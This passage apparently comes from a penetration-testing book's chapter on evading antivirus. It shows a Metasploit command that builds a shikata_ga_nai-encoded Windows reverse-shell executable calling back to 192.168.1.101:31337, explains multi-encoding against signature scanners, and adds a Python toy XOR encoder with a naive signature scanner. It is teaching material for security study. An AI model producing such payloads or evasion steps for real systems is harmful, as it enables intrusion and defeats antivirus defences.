Avoiding Detection
Now we’ll run a simple encoding of an MSF payload by piping the raw output of msfpayload into msfencode, to see how the result affects our antivirus detection:
root@bt:/# msfpayload windows/shell_reverse_tcp LHOST=192.168.1.101 LPORT=31337 R |
msfencode -e x86/shikata_ga_nai -t exe > /var/www/payload2.exe
[*] x86/shikata_ga_nai succeeded with size 342 (iteration=1)
root@bt:/# file /var/www/payload2.exe
/var/www/payload2.exe: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit
We add the R flag to the msfpayload command line to request raw output, because we pipe that output directly into msfencode. We select the x86/shikata_ga_nai encoder with -e and tell msfencode to write an executable (-t exe) to /var/www/payload2.exe. Finally, we run file as a quick check that the result is in fact a Windows PE executable, and the response confirms that it is. Unfortunately, after payload2.exe is copied over to the Windows system, AVG detects our encoded payload yet again, as shown in Figure 7-2.
Figure 7-2: AVG detected our encoded payload.
Multi-encoding
Evading antivirus detection without modifying the static binary itself is always a cat-and-mouse game, because antivirus signatures are frequently updated to catch new and changed payloads. Within the Framework, we can get better results through multi-encoding, which runs the payload through the encoder several times (the iteration count is set with msfencode’s -c option) to throw off antivirus programs that rely on static signatures.
In the preceding example, the shikata_ga_nai encoder is polymorphic, meaning that its output changes every time the command is run: it picks a fresh random key and varies the decoder stub it prepends to the payload. As a result, whether a given antivirus product will flag the output cannot be predicted in advance: the same antivirus program can flag one generated payload and miss the next. Bear in mind that signature writers also target the decoder stub itself, so a single encoding pass is no guarantee, as Figure 7-2 showed.
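The effect of polymorphic encoding on a signature scanner, and the extra passes that multi-encoding adds, can be seen in a small model. The Python below is an added example, not code from the book or from the Metasploit Framework: it implements a simplified additive-feedback XOR encoder in the style of shikata_ga_nai (a prepended key byte stands in for the real encoder's polymorphic decoder stub), a naive substring signature scanner, and the iteration loop that multi-encoding performs. The sample payload bytes, the signatures and the fixed key values are all constructed for the example; nothing here models a real AV engine.

```python
"""Toy model of a polymorphic additive-feedback XOR encoder versus a static
signature scanner. Added example; not the Metasploit encoder itself."""
import secrets

# Constructed sample bytes standing in for a raw payload (not working shellcode).
SAMPLE_PAYLOAD = bytes.fromhex("fce8820000006089e531c0648b5030")

# Constructed "AV signatures": byte patterns a static scanner would look for.
SIGNATURES = [bytes.fromhex("fce8820000"), bytes.fromhex("31c0648b5030")]


def detected(blob: bytes, signatures=SIGNATURES) -> bool:
    """Naive static scan: flag the blob if any signature appears verbatim."""
    return any(sig in blob for sig in signatures)


def encode(payload: bytes, key: int) -> bytes:
    """One encoding pass. Each byte is XORed with a running key, and the key is
    then advanced by the ciphertext byte (additive feedback), so a single-byte
    change early in the payload ripples through everything after it. The key
    is prepended so decode() can find it; shikata_ga_nai instead bakes it into
    a decoder stub whose instructions it also randomizes."""
    out = bytearray([key])
    k = key
    for b in payload:
        o = b ^ k
        out.append(o)
        k = (k + o) & 0xFF
    return bytes(out)


def decode(blob: bytes) -> bytes:
    """Inverse of encode(): recover the key from the first byte, then run the
    same feedback schedule over the ciphertext."""
    k = blob[0]
    out = bytearray()
    for o in blob[1:]:
        out.append(o ^ k)
        k = (k + o) & 0xFF
    return bytes(out)


def multi_encode(payload: bytes, keys) -> bytes:
    """Multi-encoding: feed the previous pass's output (key byte included)
    back into the encoder once per key, like msfencode -c <count>."""
    blob = payload
    for key in keys:
        blob = encode(blob, key)
    return blob


def multi_decode(blob: bytes, iterations: int) -> bytes:
    """Peel the passes off in reverse order."""
    for _ in range(iterations):
        blob = decode(blob)
    return blob


def random_keys(count: int):
    """Fresh keys in 1..255 for each run; this randomness is what makes the
    output polymorphic. Zero is excluded so the first byte is never left as-is."""
    return [secrets.randbelow(255) + 1 for _ in range(count)]


def scan_report(payload: bytes, keys) -> dict:
    """Compare the scanner's verdict on the raw payload with its verdict after
    each encoding pass, and confirm the final blob still decodes."""
    verdicts = {"raw": detected(payload)}
    blob = payload
    for i, key in enumerate(keys, start=1):
        blob = encode(blob, key)
        verdicts[f"iteration={i}"] = detected(blob)
    verdicts["roundtrip_ok"] = multi_decode(blob, len(keys)) == payload
    return verdicts


if __name__ == "__main__":
    # Two runs with random keys give different bytes for the same payload.
    run1 = multi_encode(SAMPLE_PAYLOAD, random_keys(2))
    run2 = multi_encode(SAMPLE_PAYLOAD, random_keys(2))
    print("run 1:", run1.hex())
    print("run 2:", run2.hex())
    print(scan_report(SAMPLE_PAYLOAD, random_keys(3)))
```

The scanner catches the raw bytes and misses every encoded form, because a substring signature written against the payload body cannot survive a feedback XOR under a key it does not know. What the model leaves out is exactly what AVG keyed on in Figure 7-2: the decoder stub is constant in shape even when its key and instruction choices vary, so a signature aimed at the stub rather than the body is unaffected by how many iterations you run.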